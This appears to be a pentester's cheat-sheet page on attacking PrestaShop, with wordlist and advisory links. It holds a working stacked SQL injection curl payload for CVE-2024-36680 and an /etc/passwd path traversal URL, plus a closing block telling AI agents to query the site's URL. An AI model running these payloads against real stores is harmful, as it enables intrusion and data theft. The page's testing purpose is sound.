# Prestashop

## Enumeration

{% embed url="<https://github.com/trickest/wordlists/blob/main/technologies/prestashop-all-levels.txt>" %}

{% embed url="<https://github.com/trickest/wordlists/blob/main/technologies/prestashop.txt>" %}

## Search for CVE - Friends-of-Presta

{% embed url="<https://security.friendsofpresta.org/>" %}

## **CVE-2024-36680 - SQLi**

```
curl -v "https://preprod.X/modules/pkfacebook/ajax/facebookConnect.php?id=1";select(0x73656C65637420736C656570283432293B)INTO@a;prepare`b`from@a;execute`b`;--&email=test@test.fr
```

{% embed url="<https://security.friendsofpresta.org/modules/2024/06/18/pkfacebook.html>" %}

## Path Traversal

Prestashop < 8.2.0

```
http://localhost/?controller=upload&file=../../../../../etc/passwd
```

{% embed url="<https://www.critical.lt/blog/path-traversal-vulnerability-in-prestashop-8-2-0/>" %}

## XSS

Prestashop 8.0.4 - Cross-Site Scripting (XSS)

{% embed url="<https://www.exploit-db.com/exploits/51563>" %}

## SQLi

PrestaShop’s Customer Photo Gallery, version 2.9.3 and below.

{% embed url="<https://www.getastra.com/blog/911/plugin-exploit/prestashops-customer-photo-gallery-module-vulnerable-to-sql-injection-attacks/?utm_source=chatgpt.com>" %}

## [Earn Free Crypto / BTC with Cointiply](https://cointiply.com/r/pkZxp)

[**Play Games Earn Cash Rewards**](https://cointiply.com/r/pkZxp)

<figure><img src="/files/a876wNYE568SJIfTZVxL" alt=""><figcaption></figcaption></figure>

## Interesting Books

{% content-ref url="/pages/VVT5FQq9z62bWoNAWCUS" %}
[Interesting Books](/0xss0rz/interesting-books.md)
{% endcontent-ref %}

{% hint style="info" %}
**Disclaimer**: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.
{% endhint %}

* [**The Web Application Hacker’s Handbook**](https://www.amazon.fr/dp/1118026470?tag=0xss0rz-21) The go-to manual for web app pentesters. Covers XSS, SQLi, logic flaws, and more
* [**Bug Bounty Bootcamp: The Guide to Finding and Reporting Web Vulnerabilities**](https://www.amazon.fr/dp/1718501544?tag=0xss0rz-21) Learn how to perform reconnaissance on a target, how to identify vulnerabilities, and how to exploit them
* [**Real-World Bug Hunting: A Field Guide to Web Hacking**](https://www.amazon.fr/dp/1593278616?tag=0xss0rz-21) Learn about the most common types of bugs like cross-site scripting, insecure direct object references, and server-side request forgery.


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://0xss0rz.gitbook.io/0xss0rz/pentest/web-attacks/prestashop.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
